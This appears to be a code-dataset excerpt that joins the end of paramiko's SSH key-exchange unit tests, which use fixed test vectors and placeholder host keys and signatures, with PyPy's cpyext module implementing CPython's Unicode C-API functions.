b"1F0000008100FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF0000000102" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_INIT,), transport._expect ) msg = Message() msg.add_mpint(12345) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_INIT, msg) K = ( 67592995013596137876033460028393339951879041140378510871612128162185209509220726296697886624612526735888348020498716482757677848959420073720160491114319163078862905400020959196386947926388406687288901564192071077389283980347784184487280885335302632305026248574716290537036069329724382811853044654824945750581 ) H = b"CCAC0497CF0ABA1DBF55E1A3995D17F4CC31824B0E8D95CDF8A06F169D050D80" x = ( b"210000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D40000000866616B652D736967" ) 
self.assertEqual(K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_10_gex_sha256_server_with_old_client(self): transport = FakeTransport() transport.server_mode = True kex = KexGexSHA256(transport) kex.start_kex() self.assertEqual( ( paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, ), transport._expect, ) msg = Message() msg.add_int(2048) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, msg) x = ( b"1F0000008100FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF0000000102" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_INIT,), transport._expect ) msg = Message() msg.add_mpint(12345) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_INIT, msg) K = ( 67592995013596137876033460028393339951879041140378510871612128162185209509220726296697886624612526735888348020498716482757677848959420073720160491114319163078862905400020959196386947926388406687288901564192071077389283980347784184487280885335302632305026248574716290537036069329724382811853044654824945750581 ) H = b"3DDD2AD840AD095E397BA4D0573972DC60F6461FD38A187CACA6615A5BC8ADBB" x = ( b"210000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D40000000866616B652D736967" ) self.assertEqual(K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) 
self.assertTrue(transport._activated) def test_11_kex_nistp256_client(self): K = ( 91610929826364598472338906427792435253694642563583721654249504912114314269754 ) transport = FakeTransport() transport.server_mode = False kex = KexNistp256(transport) kex.start_kex() self.assertEqual( (paramiko.kex_ecdh_nist._MSG_KEXECDH_REPLY,), transport._expect ) # fake reply msg = Message() msg.add_string("fake-host-key") Q_S = unhexlify( "<KEY>" ) msg.add_string(Q_S) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_ecdh_nist._MSG_KEXECDH_REPLY, msg) H = b"BAF7CE243A836037EB5D2221420F35C02B9AB6C957FE3BDE3369307B9612570A" self.assertEqual(K, kex.transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_12_kex_nistp256_server(self): K = ( 91610929826364598472338906427792435253694642563583721654249504912114314269754 ) transport = FakeTransport() transport.server_mode = True kex = KexNistp256(transport) kex.start_kex() self.assertEqual( (paramiko.kex_ecdh_nist._MSG_KEXECDH_INIT,), transport._expect ) # fake init msg = Message() Q_C = unhexlify( "043ae159594ba062efa121480e9ef136203fa9ec6b6e1f8723a321c16e62b945f573f3b822258cbcd094b9fa1c125cbfe5f043280893e66863cc0cb4dccbe70210" ) H = b"2EF4957AFD530DD3F05DBEABF68D724FACC060974DA9704F2AEE4C3DE861E7CA" msg.add_string(Q_C) msg.rewind() kex.parse_next(paramiko.kex_ecdh_nist._MSG_KEXECDH_INIT, msg) self.assertEqual(K, transport._K) self.assertTrue(transport._activated) self.assertEqual(H, hexlify(transport._H).upper())
en
0.828808
# Copyright (C) 2003-2009 <NAME> <<EMAIL>> # # This file is part of paramiko. # # Paramiko is free software; you can redistribute it and/or modify it under the # terms of the GNU Lesser General Public License as published by the Free # Software Foundation; either version 2.1 of the License, or (at your option) # any later version. # # Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR # A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more # details. # # You should have received a copy of the GNU Lesser General Public License # along with Paramiko; if not, write to the Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. Some unit tests for the key exchange protocols. # fake "reply" # fake reply # fake init
1.933229
2
pypy/module/cpyext/unicodeobject.py
benoitc/pypy
1
6627886
<gh_stars>1-10 from pypy.interpreter.error import OperationError from pypy.rpython.lltypesystem import rffi, lltype from pypy.rpython.lltypesystem import llmemory from pypy.module.unicodedata import unicodedb from pypy.module.cpyext.api import ( CANNOT_FAIL, Py_ssize_t, build_type_checkers, cpython_api, bootstrap_function, PyObjectFields, cpython_struct, CONST_STRING, CONST_WSTRING) from pypy.module.cpyext.pyerrors import PyErr_BadArgument from pypy.module.cpyext.pyobject import ( PyObject, PyObjectP, Py_DecRef, make_ref, from_ref, track_reference, make_typedescr, get_typedescr) from pypy.module.cpyext.stringobject import PyString_Check from pypy.module.sys.interp_encoding import setdefaultencoding from pypy.objspace.std import unicodeobject, unicodetype, stringtype from pypy.rlib import runicode from pypy.tool.sourcetools import func_renamer import sys ## See comment in stringobject.py. PyUnicodeObjectStruct = lltype.ForwardReference() PyUnicodeObject = lltype.Ptr(PyUnicodeObjectStruct) PyUnicodeObjectFields = (PyObjectFields + (("buffer", rffi.CWCHARP), ("size", Py_ssize_t))) cpython_struct("PyUnicodeObject", PyUnicodeObjectFields, PyUnicodeObjectStruct) @bootstrap_function def init_unicodeobject(space): make_typedescr(space.w_unicode.instancetypedef, basestruct=PyUnicodeObject.TO, attach=unicode_attach, dealloc=unicode_dealloc, realize=unicode_realize) # Buffer for the default encoding (used by PyUnicde_GetDefaultEncoding) DEFAULT_ENCODING_SIZE = 100 default_encoding = lltype.malloc(rffi.CCHARP.TO, DEFAULT_ENCODING_SIZE, flavor='raw', zero=True) PyUnicode_Check, PyUnicode_CheckExact = build_type_checkers("Unicode", "w_unicode") Py_UNICODE = lltype.UniChar def new_empty_unicode(space, length): """ Allocatse a PyUnicodeObject and its buffer, but without a corresponding interpreter object. The buffer may be mutated, until unicode_realize() is called. 
""" typedescr = get_typedescr(space.w_unicode.instancetypedef) py_obj = typedescr.allocate(space, space.w_unicode) py_uni = rffi.cast(PyUnicodeObject, py_obj) buflen = length + 1 py_uni.c_size = length py_uni.c_buffer = lltype.malloc(rffi.CWCHARP.TO, buflen, flavor='raw', zero=True) return py_uni def unicode_attach(space, py_obj, w_obj): "Fills a newly allocated PyUnicodeObject with a unicode string" py_unicode = rffi.cast(PyUnicodeObject, py_obj) py_unicode.c_size = len(space.unicode_w(w_obj)) py_unicode.c_buffer = lltype.nullptr(rffi.CWCHARP.TO) def unicode_realize(space, py_obj): """ Creates the unicode in the interpreter. The PyUnicodeObject buffer must not be modified after this call. """ py_uni = rffi.cast(PyUnicodeObject, py_obj) s = rffi.wcharpsize2unicode(py_uni.c_buffer, py_uni.c_size) w_obj = space.wrap(s) track_reference(space, py_obj, w_obj) return w_obj @cpython_api([PyObject], lltype.Void, external=False) def unicode_dealloc(space, py_obj): py_unicode = rffi.cast(PyUnicodeObject, py_obj) if py_unicode.c_buffer: lltype.free(py_unicode.c_buffer, flavor="raw") from pypy.module.cpyext.object import PyObject_dealloc PyObject_dealloc(space, py_obj) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISSPACE(space, ch): """Return 1 or 0 depending on whether ch is a whitespace character.""" return unicodedb.isspace(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISALPHA(space, ch): """Return 1 or 0 depending on whether ch is an alphabetic character.""" return unicodedb.isalpha(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISALNUM(space, ch): """Return 1 or 0 depending on whether ch is an alphanumeric character.""" return unicodedb.isalnum(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISLINEBREAK(space, ch): """Return 1 or 0 depending on whether ch is a linebreak character.""" return unicodedb.islinebreak(ord(ch)) 
@cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISDECIMAL(space, ch): """Return 1 or 0 depending on whether ch is a decimal character.""" return unicodedb.isdecimal(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISDIGIT(space, ch): """Return 1 or 0 depending on whether ch is a digit character.""" return unicodedb.isdigit(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISNUMERIC(space, ch): """Return 1 or 0 depending on whether ch is a numeric character.""" return unicodedb.isnumeric(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISLOWER(space, ch): """Return 1 or 0 depending on whether ch is a lowercase character.""" return unicodedb.islower(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISUPPER(space, ch): """Return 1 or 0 depending on whether ch is an uppercase character.""" return unicodedb.isupper(ord(ch)) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_ISTITLE(space, ch): """Return 1 or 0 depending on whether ch is a titlecase character.""" return unicodedb.istitle(ord(ch)) @cpython_api([Py_UNICODE], Py_UNICODE, error=CANNOT_FAIL) def Py_UNICODE_TOLOWER(space, ch): """Return the character ch converted to lower case.""" return unichr(unicodedb.tolower(ord(ch))) @cpython_api([Py_UNICODE], Py_UNICODE, error=CANNOT_FAIL) def Py_UNICODE_TOUPPER(space, ch): """Return the character ch converted to upper case.""" return unichr(unicodedb.toupper(ord(ch))) @cpython_api([Py_UNICODE], Py_UNICODE, error=CANNOT_FAIL) def Py_UNICODE_TOTITLE(space, ch): """Return the character ch converted to title case.""" return unichr(unicodedb.totitle(ord(ch))) @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_TODECIMAL(space, ch): """Return the character ch converted to a decimal positive integer. Return -1 if this is not possible. 
This macro does not raise exceptions.""" try: return unicodedb.decimal(ord(ch)) except KeyError: return -1 @cpython_api([Py_UNICODE], rffi.INT_real, error=CANNOT_FAIL) def Py_UNICODE_TODIGIT(space, ch): """Return the character ch converted to a single digit integer. Return -1 if this is not possible. This macro does not raise exceptions.""" try: return unicodedb.digit(ord(ch)) except KeyError: return -1 @cpython_api([Py_UNICODE], rffi.DOUBLE, error=CANNOT_FAIL) def Py_UNICODE_TONUMERIC(space, ch): """Return the character ch converted to a double. Return -1.0 if this is not possible. This macro does not raise exceptions.""" try: return unicodedb.numeric(ord(ch)) except KeyError: return -1.0 @cpython_api([], Py_UNICODE, error=CANNOT_FAIL) def PyUnicode_GetMax(space): """Get the maximum ordinal for a Unicode character.""" return runicode.UNICHR(runicode.MAXUNICODE) @cpython_api([PyObject], rffi.CCHARP, error=CANNOT_FAIL) def PyUnicode_AS_DATA(space, ref): """Return a pointer to the internal buffer of the object. o has to be a PyUnicodeObject (not checked).""" return rffi.cast(rffi.CCHARP, PyUnicode_AS_UNICODE(space, ref)) @cpython_api([PyObject], Py_ssize_t, error=CANNOT_FAIL) def PyUnicode_GET_DATA_SIZE(space, w_obj): """Return the size of the object's internal buffer in bytes. o has to be a PyUnicodeObject (not checked).""" return rffi.sizeof(lltype.UniChar) * PyUnicode_GET_SIZE(space, w_obj) @cpython_api([PyObject], Py_ssize_t, error=CANNOT_FAIL) def PyUnicode_GET_SIZE(space, w_obj): """Return the size of the object. o has to be a PyUnicodeObject (not checked).""" assert isinstance(w_obj, unicodeobject.W_UnicodeObject) return space.len_w(w_obj) @cpython_api([PyObject], rffi.CWCHARP, error=CANNOT_FAIL) def PyUnicode_AS_UNICODE(space, ref): """Return a pointer to the internal Py_UNICODE buffer of the object. 
ref has to be a PyUnicodeObject (not checked).""" ref_unicode = rffi.cast(PyUnicodeObject, ref) if not ref_unicode.c_buffer: # Copy unicode buffer w_unicode = from_ref(space, ref) u = space.unicode_w(w_unicode) ref_unicode.c_buffer = rffi.unicode2wcharp(u) return ref_unicode.c_buffer @cpython_api([PyObject], rffi.CWCHARP) def PyUnicode_AsUnicode(space, ref): """Return a read-only pointer to the Unicode object's internal Py_UNICODE buffer, NULL if unicode is not a Unicode object.""" # Don't use PyUnicode_Check, it will realize the object :-( w_type = from_ref(space, rffi.cast(PyObject, ref.c_ob_type)) if not space.is_true(space.issubtype(w_type, space.w_unicode)): raise OperationError(space.w_TypeError, space.wrap("expected unicode object")) return PyUnicode_AS_UNICODE(space, ref) @cpython_api([PyObject], Py_ssize_t, error=-1) def PyUnicode_GetSize(space, ref): if from_ref(space, rffi.cast(PyObject, ref.c_ob_type)) is space.w_unicode: ref = rffi.cast(PyUnicodeObject, ref) return ref.c_size else: w_obj = from_ref(space, ref) return space.len_w(w_obj) @cpython_api([PyUnicodeObject, rffi.CWCHARP, Py_ssize_t], Py_ssize_t, error=-1) def PyUnicode_AsWideChar(space, ref, buf, size): """Copy the Unicode object contents into the wchar_t buffer w. At most size wchar_t characters are copied (excluding a possibly trailing 0-termination character). Return the number of wchar_t characters copied or -1 in case of an error. Note that the resulting wchar_t string may or may not be 0-terminated. 
It is the responsibility of the caller to make sure that the wchar_t string is 0-terminated in case this is required by the application.""" c_buffer = PyUnicode_AS_UNICODE(space, rffi.cast(PyObject, ref)) c_size = ref.c_size # If possible, try to copy the 0-termination as well if size > c_size: size = c_size + 1 i = 0 while i < size: buf[i] = c_buffer[i] i += 1 if size > c_size: return c_size else: return size @cpython_api([], rffi.CCHARP, error=CANNOT_FAIL) def PyUnicode_GetDefaultEncoding(space): """Returns the currently active default encoding.""" if default_encoding[0] == '\x00': encoding = unicodetype.getdefaultencoding(space) i = 0 while i < len(encoding) and i < DEFAULT_ENCODING_SIZE: default_encoding[i] = encoding[i] i += 1 return default_encoding @cpython_api([CONST_STRING], rffi.INT_real, error=-1) def PyUnicode_SetDefaultEncoding(space, encoding): """Sets the currently active default encoding. Returns 0 on success, -1 in case of an error.""" w_encoding = space.wrap(rffi.charp2str(encoding)) setdefaultencoding(space, w_encoding) default_encoding[0] = '\x00' return 0 @cpython_api([PyObject, CONST_STRING, CONST_STRING], PyObject) def PyUnicode_AsEncodedObject(space, w_unicode, llencoding, llerrors): """Encode a Unicode object and return the result as Python object. encoding and errors have the same meaning as the parameters of the same name in the Unicode encode() method. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec.""" if not PyUnicode_Check(space, w_unicode): PyErr_BadArgument(space) encoding = errors = None if llencoding: encoding = rffi.charp2str(llencoding) if llerrors: errors = rffi.charp2str(llerrors) return unicodetype.encode_object(space, w_unicode, encoding, errors) @cpython_api([PyObject, CONST_STRING, CONST_STRING], PyObject) def PyUnicode_AsEncodedString(space, w_unicode, llencoding, llerrors): """Encode a Unicode object and return the result as Python string object. 
encoding and errors have the same meaning as the parameters of the same name in the Unicode encode() method. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec.""" w_str = PyUnicode_AsEncodedObject(space, w_unicode, llencoding, llerrors) if not PyString_Check(space, w_str): raise OperationError(space.w_TypeError, space.wrap( "encoder did not return a string object")) return w_str @cpython_api([PyObject], PyObject) def PyUnicode_AsUnicodeEscapeString(space, w_unicode): """Encode a Unicode object using Unicode-Escape and return the result as Python string object. Error handling is "strict". Return NULL if an exception was raised by the codec.""" if not PyUnicode_Check(space, w_unicode): PyErr_BadArgument(space) return unicodetype.encode_object(space, w_unicode, 'unicode-escape', 'strict') @cpython_api([CONST_WSTRING, Py_ssize_t], PyObject) def PyUnicode_FromUnicode(space, wchar_p, length): """Create a Unicode Object from the Py_UNICODE buffer u of the given size. u may be NULL which causes the contents to be undefined. It is the user's responsibility to fill in the needed data. The buffer is copied into the new object. If the buffer is not NULL, the return value might be a shared object. Therefore, modification of the resulting Unicode object is only allowed when u is NULL.""" if wchar_p: s = rffi.wcharpsize2unicode(wchar_p, length) return make_ref(space, space.wrap(s)) else: return rffi.cast(PyObject, new_empty_unicode(space, length)) @cpython_api([CONST_WSTRING, Py_ssize_t], PyObject) def PyUnicode_FromWideChar(space, wchar_p, length): """Create a Unicode object from the wchar_t buffer w of the given size. 
Return NULL on failure.""" # PyPy supposes Py_UNICODE == wchar_t return PyUnicode_FromUnicode(space, wchar_p, length) @cpython_api([PyObject, CONST_STRING], PyObject) def _PyUnicode_AsDefaultEncodedString(space, w_unicode, errors): return PyUnicode_AsEncodedString(space, w_unicode, lltype.nullptr(rffi.CCHARP.TO), errors) @cpython_api([CONST_STRING, Py_ssize_t, CONST_STRING, CONST_STRING], PyObject) def PyUnicode_Decode(space, s, size, encoding, errors): """Create a Unicode object by decoding size bytes of the encoded string s. encoding and errors have the same meaning as the parameters of the same name in the unicode() built-in function. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec.""" w_str = space.wrap(rffi.charpsize2str(s, size)) w_encoding = space.wrap(rffi.charp2str(encoding)) if errors: w_errors = space.wrap(rffi.charp2str(errors)) else: w_errors = space.w_None return space.call_method(w_str, 'decode', w_encoding, w_errors) @cpython_api([PyObject], PyObject) def PyUnicode_FromObject(space, w_obj): """Shortcut for PyUnicode_FromEncodedObject(obj, NULL, "strict") which is used throughout the interpreter whenever coercion to Unicode is needed.""" if space.is_w(space.type(w_obj), space.w_unicode): return w_obj else: return space.call_function(space.w_unicode, w_obj) @cpython_api([PyObject, CONST_STRING, CONST_STRING], PyObject) def PyUnicode_FromEncodedObject(space, w_obj, encoding, errors): """Coerce an encoded object obj to an Unicode object and return a reference with incremented refcount. String and other char buffer compatible objects are decoded according to the given encoding and using the error handling defined by errors. Both can be NULL to have the interface use the default values (see the next section for details). 
All other objects, including Unicode objects, cause a TypeError to be set.""" w_encoding = space.wrap(rffi.charp2str(encoding)) if errors: w_errors = space.wrap(rffi.charp2str(errors)) else: w_errors = space.w_None # - unicode is disallowed # - raise TypeError for non-string types if space.is_true(space.isinstance(w_obj, space.w_unicode)): w_meth = None else: try: w_meth = space.getattr(w_obj, space.wrap('decode')) except OperationError, e: if not e.match(space, space.w_AttributeError): raise w_meth = None if w_meth is None: raise OperationError(space.w_TypeError, space.wrap("decoding Unicode is not supported")) return space.call_function(w_meth, w_encoding, w_errors) @cpython_api([CONST_STRING], PyObject) def PyUnicode_FromString(space, s): """Create a Unicode object from an UTF-8 encoded null-terminated char buffer""" w_str = space.wrap(rffi.charp2str(s)) return space.call_method(w_str, 'decode', space.wrap("utf-8")) @cpython_api([CONST_STRING, Py_ssize_t], PyObject) def PyUnicode_FromStringAndSize(space, s, size): """Create a Unicode Object from the char buffer u. The bytes will be interpreted as being UTF-8 encoded. u may also be NULL which causes the contents to be undefined. It is the user's responsibility to fill in the needed data. The buffer is copied into the new object. If the buffer is not NULL, the return value might be a shared object. Therefore, modification of the resulting Unicode object is only allowed when u is NULL.""" if s: return make_ref(space, PyUnicode_DecodeUTF8( space, s, size, lltype.nullptr(rffi.CCHARP.TO))) else: return rffi.cast(PyObject, new_empty_unicode(space, size)) @cpython_api([rffi.INT_real], PyObject) def PyUnicode_FromOrdinal(space, ordinal): """Create a Unicode Object from the given Unicode code point ordinal. The ordinal must be in range(0x10000) on narrow Python builds (UCS2), and range(0x110000) on wide builds (UCS4). 
A ValueError is raised in case it is not.""" w_ordinal = space.wrap(rffi.cast(lltype.Signed, ordinal)) return space.call_function(space.builtin.get('unichr'), w_ordinal) @cpython_api([PyObjectP, Py_ssize_t], rffi.INT_real, error=-1) def PyUnicode_Resize(space, ref, newsize): # XXX always create a new string so far py_uni = rffi.cast(PyUnicodeObject, ref[0]) if not py_uni.c_buffer: raise OperationError(space.w_SystemError, space.wrap( "PyUnicode_Resize called on already created string")) try: py_newuni = new_empty_unicode(space, newsize) except MemoryError: Py_DecRef(space, ref[0]) ref[0] = lltype.nullptr(PyObject.TO) raise to_cp = newsize oldsize = py_uni.c_size if oldsize < newsize: to_cp = oldsize for i in range(to_cp): py_newuni.c_buffer[i] = py_uni.c_buffer[i] Py_DecRef(space, ref[0]) ref[0] = rffi.cast(PyObject, py_newuni) return 0 def make_conversion_functions(suffix, encoding): @cpython_api([PyObject], PyObject) @func_renamer('PyUnicode_As%sString' % suffix) def PyUnicode_AsXXXString(space, w_unicode): """Encode a Unicode object and return the result as Python string object. Error handling is "strict". Return NULL if an exception was raised by the codec.""" if not PyUnicode_Check(space, w_unicode): PyErr_BadArgument(space) return unicodetype.encode_object(space, w_unicode, encoding, "strict") @cpython_api([CONST_STRING, Py_ssize_t, CONST_STRING], PyObject) @func_renamer('PyUnicode_Decode%s' % suffix) def PyUnicode_DecodeXXX(space, s, size, errors): """Create a Unicode object by decoding size bytes of the encoded string s. Return NULL if an exception was raised by the codec. 
""" w_s = space.wrap(rffi.charpsize2str(s, size)) if errors: w_errors = space.wrap(rffi.charp2str(errors)) else: w_errors = space.w_None return space.call_method(w_s, 'decode', space.wrap(encoding), w_errors) globals()['PyUnicode_Decode%s' % suffix] = PyUnicode_DecodeXXX @cpython_api([CONST_WSTRING, Py_ssize_t, CONST_STRING], PyObject) @func_renamer('PyUnicode_Encode%s' % suffix) def PyUnicode_EncodeXXX(space, s, size, errors): """Encode the Py_UNICODE buffer of the given size and return a Python string object. Return NULL if an exception was raised by the codec.""" w_u = space.wrap(rffi.wcharpsize2unicode(s, size)) if errors: w_errors = space.wrap(rffi.charp2str(errors)) else: w_errors = space.w_None return space.call_method(w_u, 'encode', space.wrap(encoding), w_errors) globals()['PyUnicode_Encode%s' % suffix] = PyUnicode_EncodeXXX make_conversion_functions('UTF8', 'utf-8') make_conversion_functions('ASCII', 'ascii') make_conversion_functions('Latin1', 'latin-1') if sys.platform == 'win32': make_conversion_functions('MBCS', 'mbcs') @cpython_api([rffi.CCHARP, Py_ssize_t, rffi.CCHARP, rffi.INTP], PyObject) def PyUnicode_DecodeUTF16(space, s, size, llerrors, pbyteorder): """Decode length bytes from a UTF-16 encoded buffer string and return the corresponding Unicode object. errors (if non-NULL) defines the error handling. It defaults to "strict". If byteorder is non-NULL, the decoder starts decoding using the given byte order: *byteorder == -1: little endian *byteorder == 0: native order *byteorder == 1: big endian If *byteorder is zero, and the first two bytes of the input data are a byte order mark (BOM), the decoder switches to this byte order and the BOM is not copied into the resulting Unicode string. If *byteorder is -1 or 1, any byte order mark is copied to the output (where it will result in either a \ufeff or a \ufffe character). After completion, *byteorder is set to the current byte order at the end of input data. 
If byteorder is NULL, the codec starts in native order mode. Return NULL if an exception was raised by the codec.""" string = rffi.charpsize2str(s, size) if pbyteorder is not None: llbyteorder = rffi.cast(lltype.Signed, pbyteorder[0]) if llbyteorder < 0: byteorder = "little" elif llbyteorder > 0: byteorder = "big" else: byteorder = "native" else: byteorder = "native" if llerrors: errors = rffi.charp2str(llerrors) else: errors = None result, length, byteorder = runicode.str_decode_utf_16_helper( string, size, errors, True, # final ? false for multiple passes? None, # errorhandler byteorder) if pbyteorder is not None: pbyteorder[0] = rffi.cast(rffi.INT, byteorder) return space.wrap(result) @cpython_api([rffi.CCHARP, Py_ssize_t, rffi.CCHARP, rffi.INTP], PyObject) def PyUnicode_DecodeUTF32(space, s, size, llerrors, pbyteorder): """Decode length bytes from a UTF-32 encoded buffer string and return the corresponding Unicode object. errors (if non-NULL) defines the error handling. It defaults to "strict". If byteorder is non-NULL, the decoder starts decoding using the given byte order: *byteorder == -1: little endian *byteorder == 0: native order *byteorder == 1: big endian If *byteorder is zero, and the first four bytes of the input data are a byte order mark (BOM), the decoder switches to this byte order and the BOM is not copied into the resulting Unicode string. If *byteorder is -1 or 1, any byte order mark is copied to the output. After completion, *byteorder is set to the current byte order at the end of input data. In a narrow build codepoints outside the BMP will be decoded as surrogate pairs. If byteorder is NULL, the codec starts in native order mode. Return NULL if an exception was raised by the codec. 
""" string = rffi.charpsize2str(s, size) if pbyteorder: llbyteorder = rffi.cast(lltype.Signed, pbyteorder[0]) if llbyteorder < 0: byteorder = "little" elif llbyteorder > 0: byteorder = "big" else: byteorder = "native" else: byteorder = "native" if llerrors: errors = rffi.charp2str(llerrors) else: errors = None result, length, byteorder = runicode.str_decode_utf_32_helper( string, size, errors, True, # final ? false for multiple passes? None, # errorhandler byteorder) if pbyteorder is not None: pbyteorder[0] = rffi.cast(rffi.INT, byteorder) return space.wrap(result) @cpython_api([PyObject, PyObject], rffi.INT_real, error=-2) def PyUnicode_Compare(space, w_left, w_right): """Compare two strings and return -1, 0, 1 for less than, equal, and greater than, respectively.""" return space.int_w(space.cmp(w_left, w_right)) @cpython_api([rffi.CWCHARP, rffi.CWCHARP, Py_ssize_t], lltype.Void) def Py_UNICODE_COPY(space, target, source, length): """Roughly equivalent to memcpy() only the base size is Py_UNICODE copies sizeof(Py_UNICODE) * length bytes from source to target""" for i in range(0, length): target[i] = source[i] @cpython_api([PyObject, PyObject], PyObject) def PyUnicode_Format(space, w_format, w_args): """Return a new string object from format and args; this is analogous to format % args. The args argument must be a tuple.""" return space.mod(w_format, w_args) @cpython_api([PyObject, PyObject], PyObject) def PyUnicode_Join(space, w_sep, w_seq): """Join a sequence of strings using the given separator and return the resulting Unicode string.""" return space.call_method(w_sep, 'join', w_seq) @cpython_api([PyObject, PyObject, PyObject, Py_ssize_t], PyObject) def PyUnicode_Replace(space, w_str, w_substr, w_replstr, maxcount): """Replace at most maxcount occurrences of substr in str with replstr and return the resulting Unicode object. 
maxcount == -1 means replace all occurrences.""" return space.call_method(w_str, "replace", w_substr, w_replstr, space.wrap(maxcount)) @cpython_api([PyObject, PyObject, Py_ssize_t, Py_ssize_t, rffi.INT_real], rffi.INT_real, error=-1) def PyUnicode_Tailmatch(space, w_str, w_substr, start, end, direction): """Return 1 if substr matches str[start:end] at the given tail end (direction == -1 means to do a prefix match, direction == 1 a suffix match), 0 otherwise. Return -1 if an error occurred.""" str = space.unicode_w(w_str) substr = space.unicode_w(w_substr) if rffi.cast(lltype.Signed, direction) <= 0: return stringtype.stringstartswith(str, substr, start, end) else: return stringtype.stringendswith(str, substr, start, end) @cpython_api([PyObject, PyObject, Py_ssize_t, Py_ssize_t], Py_ssize_t, error=-1) def PyUnicode_Count(space, w_str, w_substr, start, end): """Return the number of non-overlapping occurrences of substr in str[start:end]. Return -1 if an error occurred.""" w_count = space.call_method(w_str, "count", w_substr, space.wrap(start), space.wrap(end)) return space.int_w(w_count) @cpython_api([PyObject, PyObject, Py_ssize_t, Py_ssize_t, rffi.INT_real], Py_ssize_t, error=-2) def PyUnicode_Find(space, w_str, w_substr, start, end, direction): """Return the first position of substr in str*[*start:end] using the given direction (direction == 1 means to do a forward search, direction == -1 a backward search). 
The return value is the index of the first match; a value of -1 indicates that no match was found, and -2 indicates that an error occurred and an exception has been set.""" if rffi.cast(lltype.Signed, direction) > 0: w_pos = space.call_method(w_str, "find", w_substr, space.wrap(start), space.wrap(end)) else: w_pos = space.call_method(w_str, "rfind", w_substr, space.wrap(start), space.wrap(end)) return space.int_w(w_pos) @cpython_api([PyObject, PyObject, Py_ssize_t], PyObject) def PyUnicode_Split(space, w_str, w_sep, maxsplit): """Split a string giving a list of Unicode strings. If sep is NULL, splitting will be done at all whitespace substrings. Otherwise, splits occur at the given separator. At most maxsplit splits will be done. If negative, no limit is set. Separators are not included in the resulting list.""" if w_sep is None: w_sep = space.w_None return space.call_method(w_str, "split", w_sep, space.wrap(maxsplit)) @cpython_api([PyObject, rffi.INT_real], PyObject) def PyUnicode_Splitlines(space, w_str, keepend): """Split a Unicode string at line breaks, returning a list of Unicode strings. CRLF is considered to be one line break. If keepend is 0, the Line break characters are not included in the resulting strings.""" return space.call_method(w_str, "splitlines", space.wrap(keepend))
# NOTE(review): from here to the end of this chunk the module header and the
# first batch of Py_UNICODE_* helpers defined earlier in this file are
# repeated verbatim -- this looks like an accidental paste; confirm and
# deduplicate.
from pypy.interpreter.error import OperationError
from pypy.rpython.lltypesystem import rffi, lltype
from pypy.rpython.lltypesystem import llmemory
from pypy.module.unicodedata import unicodedb
from pypy.module.cpyext.api import (
